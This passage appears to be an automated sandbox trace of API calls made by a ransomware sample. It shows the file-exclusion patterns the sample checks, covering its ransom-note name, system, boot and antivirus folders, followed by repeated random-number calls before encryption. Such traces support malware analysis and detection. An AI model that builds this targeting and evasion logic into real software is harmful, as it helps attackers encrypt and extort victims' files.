shared\\ink\\lv-LV\\*", pszSpec="*.dll") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.lnk") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.bat") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.ini") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.msi") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.scf") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*pagefile.sys*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*AppData*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\winrar\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\java\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\windows\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\ESET\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\AVG\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*Atheros*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*Realtek*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*bootmgr*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*boot*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*boot*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*IO.SYS*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*ntldr*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*chrome*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*opera*") returned 0 [0159.289] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*firefox*") returned 0 [0159.289] wcslen (_String="\\\\?\\") returned 0x4 [0159.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad6b8 [0159.289] wcscmp (_String1=".", _String2=".") returned 0 [0159.289] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.289] wcscmp (_String1="..", _String2=".") returned 1 [0159.289] wcscmp (_String1="..", _String2="..") returned 0 [0159.289] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.289] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.289] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.289] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.290] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.290] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.290] strlen (_Str="NMoreira") returned 0x8 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.290] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.291] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.292] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 